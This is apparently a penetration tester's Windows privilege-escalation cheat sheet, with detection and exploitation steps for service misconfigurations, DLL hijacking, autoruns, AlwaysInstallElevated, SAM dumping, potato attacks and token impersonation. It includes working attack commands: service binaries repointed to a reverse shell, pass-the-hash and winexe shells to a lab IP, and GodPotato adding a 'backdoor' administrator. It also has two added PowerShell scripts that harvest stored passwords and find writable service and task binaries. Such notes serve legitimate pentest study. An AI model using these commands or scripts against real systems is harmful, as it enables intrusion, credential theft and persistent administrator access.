
PowerUp: dot-source it with . .\PowerUp.ps1 then run Invoke-AllChecks
WinPEAS: winPEAS.exe, doc - https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe
WinPEAS colors (enable ANSI output in the console before running it): REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

  1. kernel exploit:

    • Detection:
      • wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only
      • compare results with https://github.com/SecWiki/windows-kernel-exploits
    • Exploitation:
      • download pre-compiled versions from above link
      • manually compile exploit and upload to box

2-6 are all service checks (avoid rabbit holes: a service is only worth chasing if we can MODIFY it (config, registry key, binary or path) AND START/STOP it, or it starts automatically, e.g. at boot)

WinPEAS: ./winpeas servicesinfo. Check that we can start/stop the service with accesschk.exe /accepteula -ucqv <user> <service name> (-c = Windows service object)

  1. Service: Insecure Permissions:

    • Detection:
      • WinPEAS Modifiable Services - ChangeConfig
      • manually accesschk64.exe -wuvc USER *
    • Exploitation:
      • manually repoint the binary and restart the service: sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\"" then sc stop daclsvc; sc start daclsvc
  2. Service: Unquoted Service Path:

    • Detection:
      • WinPEAS: "No quotes and Space detected"
      • manually list service names and paths: wmic service get name,displayname,pathname,startmode
      • manually sc query state= all (service names and states)
      • then check for write permission on each directory along the unquoted path (icacls, or echo a test file into the directory): accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
    • Exploitation:
      • manually create service binary, upload it to the writable directory under the name Windows tries first (for ...\Unquoted Path Service\Common Files\... that is C:\Program Files\Unquoted Path Service\Common.exe), then sc stop NAME; sc start NAME
  3. Service: Weak Registry Permissions:

    • Detection:
      • WinPEAS: service registry key permissions showing e.g. (Interactive [Allow: FullControl])
      • manually .\accesschk64.exe -kwusv hklm\System\CurrentControlSet\Services | select-string -pattern <GROUP or USER> -casesensitive -context 7,7
    • Exploitation:
      • manually change the ImagePath, then restart the service: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f then sc stop regsvc; sc start regsvc
  4. Service: Insecure Service Executable:

    • Detection:
      • WinPEAS File Permissions: Everyone [Allow: AllAccess]
      • manually accesschk64.exe -wuv FILE/DIRECTORY
    • Exploitation:
      • manually create service binary, upload it, overwrite the service executable, then restart the service: copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
  5. DLL hijacking:

    • Detection:
      • WinPEAS: DLL Hijacking in PATH (a directory on PATH that we can write to)
      • manually in Process Monitor filter the service process on Result is NAME NOT FOUND and Path ends with .dll to find a DLL it looks for but cannot find
    • Exploitation:
      • manually create a DLL with the payload in DllMain, name it as the missing DLL, upload it to the writable search-path directory, then sc stop NAME; sc start NAME
  6. Registry: autorun:

    • Detection:
      • WinPEAS ./winpeas applicationsinfo (Autorun applications)
      • WinPEAS: an autorun entry whose FilePerms show Everyone [AllAccess]
    • Exploitation:
      • manually create .exe, upload it over the writable autorun binary, then wait for an administrator to log in (the autorun runs in the logging-in user's context)
  7. Registry: AlwaysInstallElevated:

    • Detection:
      • WinPEAS ./winpeas windowscreds
      • manually reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
      • and reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated (both must be 0x1)
    • Exploitation:
      • manually create an MSI containing the payload, upload it, then install it with msiexec: the install runs as SYSTEM
  8. Passwords: Registry

    • Detection:
      • WinPEAS ./winpeas filesinfo userinfo 
      • manually reg query HKLM /f password /t REG_SZ /s
      • manually reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
      • manually we can spawn a shell from Kali with a password found in the registry: winexe -U 'admin%password' --system //10.10.74.192 cmd.exe
  9. Passwords: Saved Creds

    • Detection:
      • WinPEAS ./winpeas windowscreds 
      • manually cmdkey /list
    • Exploitation:
      • set up a listener, then run runas /savecred /user:admin C:\PrivEsc\reverse.exe
  10. Passwords: Configuration Files

    • Detection:
      • WinPEAS ./winpeas searchfast filesinfo 
      • manually dir /s *pass* == *.config
      • manually findstr /si password *.xml *.ini *.txt
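One sweep over the credential sources items 8 to 10 query one command at a time (Winlogon autologon values, password-looking registry values, saved cmdkey credentials, password strings in config files). This is an added example, not part of the original notes or of WinPEAS; $SearchRoots and $FileTypes are placeholders to adjust per box, the regexes are heuristics, and the cmdkey parser assumes English "Target:" / "User:" labels.

```powershell
# Added example (not from the original notes). Assumptions: $SearchRoots/$FileTypes are
# placeholders, the patterns are heuristics (expect false positives), cmdkey labels are English.

$SearchRoots = @('C:\Users', 'C:\inetpub', 'C:\ProgramData', 'C:\xampp')
$FileTypes   = @('*.xml', '*.ini', '*.txt', '*.config', '*.conf', '*.ps1', '*.bat')
$FilePattern = '(password|passwd|pwd)\s*[=:]\s*\S+'

function Get-WinlogonAutoLogon {
    # Same key as: reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
    $k = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    if ($k -and $k.DefaultPassword) {
        [pscustomobject]@{ Source = 'Winlogon'; Name = "$($k.DefaultDomainName)\$($k.DefaultUserName)"
                           Value = $k.DefaultPassword; Note = "AutoAdminLogon=$($k.AutoAdminLogon)" }
    }
}

function Find-RegistryPasswords {
    # Equivalent of "reg query HKLM /f password /t REG_SZ /s": REG_SZ values whose name or
    # data mentions a password. Recursing whole hives is slow; pass narrower roots.
    param([string[]]$Roots = @('HKLM:\SOFTWARE', 'HKCU:\SOFTWARE'))
    foreach ($root in $Roots) {
        Get-ChildItem -Path $root -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $key = $_
            foreach ($name in $key.GetValueNames()) {
                if ($key.GetValueKind($name) -ne 'String') { continue }
                $data = [string]$key.GetValue($name)
                # skip empty data and policy-style booleans ("0"/"1") that only share the name
                if (($name -match 'pass|pwd' -or $data -match 'pass(word)?\s*[=:]') -and $data -match '\S' -and $data -notmatch '^\d+$') {
                    [pscustomobject]@{ Source = 'Registry'; Name = "$($key.Name)\$name"; Value = $data; Note = '' }
                }
            }
        }
    }
}

function Get-SavedCredentials {
    # Parses "cmdkey /list"; each target can be used with: runas /savecred /user:<Value> <cmd>
    $cur = $null
    foreach ($line in (cmdkey /list)) {
        if ($line -match '^\s*Target:\s*(.+)$') { $cur = [pscustomobject]@{ Source = 'cmdkey'; Name = $Matches[1].Trim(); Value = ''; Note = '' } }
        elseif ($cur -and $line -match '^\s*User:\s*(.+)$') { $cur.Value = $Matches[1].Trim(); $cur; $cur = $null }
    }
}

function Find-PasswordsInFiles {
    # Equivalent of "findstr /si password *.xml *.ini *.txt" with a tighter pattern and a size cap.
    param([string[]]$Roots = $SearchRoots)
    foreach ($root in ($Roots | Where-Object { Test-Path $_ })) {
        Get-ChildItem -Path $root -Recurse -File -Include $FileTypes -ErrorAction SilentlyContinue |
            Where-Object { $_.Length -lt 2MB } |
            Select-String -Pattern $FilePattern -ErrorAction SilentlyContinue |
            ForEach-Object { [pscustomobject]@{ Source = 'File'; Name = "$($_.Path):$($_.LineNumber)"; Value = $_.Line.Trim(); Note = '' } }
    }
}

@(Get-WinlogonAutoLogon) + @(Get-SavedCredentials) + @(Find-PasswordsInFiles) | Format-Table -AutoSize -Wrap
# The full-hive registry sweep is slow; run it on its own, narrowed where possible:
# Find-RegistryPasswords -Roots 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' | Format-Table -AutoSize -Wrap
```

Every hit still has to be tried by hand (winexe / runas /savecred as in items 8 and 9); the script only shortens the hunt, it does not validate credentials.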
  11. Passwords: Security Account Manager (SAM)

    • Detection:
      • WinPEAS ./winpeas searchfast filesinfo, search for SAM and SYSTEM copies (backup locations such as C:\Windows\Repair and C:\Windows\System32\config\RegBack)
      • manually (needs admin or backup rights on the box): reg.exe save hklm\sam SAM; reg.exe save hklm\system SYSTEM; reg.exe save hklm\security SECURITY, then move the files to Kali
      • manually dump the hashes: impacket-secretsdump -sam 'path/to/SAM' -system 'path/to/system' LOCAL
    • Exploitation:
      • manually pass the hash: pth-winexe --system -U 'admin%hash' //10.10.74.192 cmd.exe
  12. Scheduled tasks:

    • Detection:
      • manually look for interesting folders in C:\ (writable directories or binaries referenced by a task)
      • PowerUp Get-ModifiableScheduledTaskFile
    • Exploitation:
      • manually create .exe, upload it, place it in the identified location, then wait for the task to run
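One pass over the writable targets the checklist probes by hand in items 2 to 6 and 12 (service binaries and their directories, unquoted service paths, service registry keys, HKLM Run keys, scheduled task actions), reporting anything the current token can write to. This is an added example, not part of the original notes, PowerUp or WinPEAS. Assumptions: it is run as the low-privileged user under test; only Allow ACEs are evaluated (Deny ACEs and ownership are ignored), so every hit still gets confirmed with accesschk or a real write; Get-ScheduledTask needs Windows 8 / Server 2012 or later.

```powershell
# Added example (not from the original notes). Assumptions: run as the low-priv user under
# test; Allow ACEs only (Deny ACEs, ownership ignored); Get-ScheduledTask needs Win8/2012+.

$identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids   = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })
# Access-mask bits that let us write: WriteData/SetValue (0x2), AppendData/CreateSubKey (0x4),
# GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000).
$writeMask = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000

function Test-Writable {
    # True when an Allow ACE for one of our SIDs carries a write bit. Works for file-system
    # paths and for registry paths such as HKLM:\SYSTEM\... (Get-Acl handles both).
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($mySids -notcontains $sid) { continue }
        $rights = if ($ace -is [System.Security.AccessControl.RegistryAccessRule]) { [int]$ace.RegistryRights }
                  else { [int]$ace.FileSystemRights }
        if (($rights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

function Get-CommandPath {
    # Executable portion of a service/task command line, plus whether it is unquoted.
    param([string]$CommandLine)
    $cl = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cl -match '^"([^"]+)"') { return [pscustomobject]@{ Exe = $Matches[1]; Unquoted = $false } }
    $exe = if ($cl -match '^(.+?\.exe)(\s|$)') { $Matches[1] } else { ($cl -split '\s+')[0] }
    [pscustomobject]@{ Exe = $exe; Unquoted = $exe.Contains(' ') }
}

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Kind, [string]$Target, [string]$Path) {
    $findings.Add([pscustomobject]@{ Kind = $Kind; Target = $Target; Path = $Path })
}

# 1) Services: unquoted path, writable binary or binary directory, writable service key.
foreach ($svc in (Get-CimInstance -ClassName Win32_Service | Where-Object { $_.PathName })) {
    $cmd = Get-CommandPath $svc.PathName
    $exe = $cmd.Exe
    $tag = "$($svc.Name) (start=$($svc.StartMode), runs as $($svc.StartName))"
    if (-not [System.IO.Path]::IsPathRooted($exe)) { continue }
    if ($cmd.Unquoted) {
        # CreateProcess tries C:\Program.exe, then C:\Program Files\Unquoted.exe, ... in order;
        # a candidate is useful when we can write to its parent directory.
        $i = 0
        while (($i = $exe.IndexOf(' ', $i + 1)) -gt 0) {
            $candidate = $exe.Substring(0, $i) + '.exe'
            if (Test-Writable (Split-Path $candidate -Parent)) { Add-Finding 'UnquotedPath' $tag $candidate }
        }
    }
    if (Test-Writable $exe) { Add-Finding 'WritableBinary' $tag $exe }
    elseif (Test-Writable (Split-Path $exe -Parent)) { Add-Finding 'WritableBinaryDir' $tag (Split-Path $exe -Parent) }
    if (Test-Writable "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)") {
        Add-Finding 'WritableServiceKey' $tag "HKLM\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
    }
}

# 2) HKLM Run keys: these execute in the context of whoever logs on, admins included.
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
        $exe = (Get-CommandPath ([string]$p.Value)).Exe
        if ([System.IO.Path]::IsPathRooted($exe) -and (Test-Writable $exe)) { Add-Finding 'WritableAutorun' "$key\$($p.Name)" $exe }
    }
}

# 3) Scheduled tasks: writable action binary (what PowerUp's Get-ModifiableScheduledTaskFile looks for).
foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
        $exe = (Get-CommandPath $action.Execute).Exe
        if ([System.IO.Path]::IsPathRooted($exe) -and (Test-Writable $exe)) {
            Add-Finding 'WritableTaskBinary' "$($task.TaskPath)$($task.TaskName) (runs as $($task.Principal.UserId))" $exe
        }
    }
}

$findings | Sort-Object Kind, Target | Format-Table -AutoSize -Wrap
```

A hit is only useful if the thing runs again as a privileged account: for services that means start=Auto plus a reboot, or accesschk.exe /accepteula -ucqv <user> <service> confirming we can stop/start it; for Run keys and tasks, the Target column shows who it runs as. The ChangeConfig permission on the service object itself (item 1) is not covered here, since that lives in the service DACL rather than on a file or registry key; accesschk -wuvc is still the check for it.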
  13. Insecure GUI Apps:

    • Detection:
      • manually tasklist /V | findstr mspaint.exe (shows which user the GUI app runs as)
    • Exploitation:
      • In Paint, click "File" and then "Open". In the open file dialog box, click in the navigation input and paste: file://c:/windows/system32/cmd.exe (the cmd inherits the GUI app's user)
  14. Installed Applications:

    • Detection:
      • Seatbelt: seatbelt.exe NonstandardProcesses
      • WinPEAS winPEASany.exe processinfo
    • Exploitation:
      • search Exploit-DB for the installed application versions
  15. Hot Potato:

    • Exploitation:
      • manually (older Windows builds where NBNS/WPAD spoofing still works): potato.exe -ip 10.10.10.10 -cmd "C:\PrivEsc\reverse.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
  16. Token Impersonation:

    • Detection:
      • manually whoami /priv, look for SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege), typically held by service accounts such as IIS or SQL Server
    • Exploitation:
      • manually GodPotato.exe -cmd "net user /add backdoor Password123" then GodPotato.exe -cmd "net localgroup administrators /add backdoor"